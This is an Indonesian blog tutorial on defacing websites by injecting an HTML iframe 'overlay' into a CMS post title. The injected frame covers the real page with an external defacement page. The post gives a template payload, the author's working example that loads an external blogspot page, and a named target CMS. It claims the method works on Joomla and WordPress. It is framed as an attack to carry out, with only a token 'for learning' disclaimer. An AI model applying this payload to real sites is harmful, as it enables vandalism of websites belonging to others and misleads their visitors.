Tutorial Deface Dengan JS Overlay

Dipost oleh: Dirilis: Monday, 21 July 2014 | Category: ,

SEE ALL EPISODES

Kali ini saya akan share teknik deface yang "jarang" digunakan karena ini mungkin menjadi alternatif terakhir jika kita gagal memasang shell pada web target. Ada kalanya sebuah web tidak support file php [kalo ini masih bisa di tamper], atau Web tersebut tidak menyediakan fasilitas upload.
Lalu bagaimana solusinya agar kita bisa men-deface web tersebut ? Dengan JS Overlay. Sistem kerjanya berbeda dengan teknik deface yang didahului dengan mengupload shell. Jika shell diupload, maka biasanya script asli yang diganti. Namun untuk JS Overlay, halaman asli web tersebut "ditimpa" oleh halaman deface yang kita buat. Jadi halaman asli tersebut tetap ada namun ditutup oleh script deface kita. Caranya ?

Sebelumnya kalian membutuhkan script deface yang sudah tertanam di web lain. Jika sebelumnya belum pernah melakukan deface, kalian bisa membuat web/blog sendiri, dideface sendiri hanya sebagai "umpan" dari JS Overlay.

Sebagai contoh, target kita kali ini adalah Lokomedia. Seharusnya bisa upload shell. namun sudah saya coba berkali-kali tidak bisa. Mungkin sudah diantisipasi oleh Webmasternya. Makanya saya coba menggunakan metode JS Overlay.

Oke, kita mulai tutorialnya :

 
Login ke web target. Buat post baru/kalian bisa mengedit judul/nama dari web tersebut.

 

Masukkan script ini di bagian judul :
<center><iframe src='[situs yang pernah dideface]' height='820px' width='1100px' scrolling='no' frameborder='0'></center>
Untuk tulisan berwarna merah silahkan diganti dengan url kalian sendiri. Intinya kita memanggil script dari url tersebut untuk menutupi halaman yang akan kita deface.
Untuk contoh, ini script saya :
<center><iframe src='http://personal-jsoverlay.blogspot.com/' height='820px' width='1100px' scrolling='no' frameborder='0'></center>
Lalu klik save
 
Upzzz, you got HACKED !!!!

Teknik ini [sepertinya] bisa digunakan di semua CMS. Entah itu Lokomedia, Joomla, WP, dll.
Kekurangan dari teknik ini adalah kita hanya punya sekali akses ke web korban karena kita tidak bisa menanam backdoor.
Tutorial ini hanya sebagai pembelajaran. Gunakan sebaik-baiknya. Resiko tanggung dewe.


G+

About Wiien to tv

Pradja DJ
Semoga artikel ini bermanfaat untuk anda, jangan lupa shere dan follow. terimakasih atas support dan dukungan anda, jika ada suatu kata yang kurang dipahami silahkan berkomentar - Admin - Wiientotv

Apa komentar anda tentang artikel ini ? Silahkan tulis dan kirim komentar anda disini, Terimakasih

Wiientotv
Copyright © 2018 - All rights reserved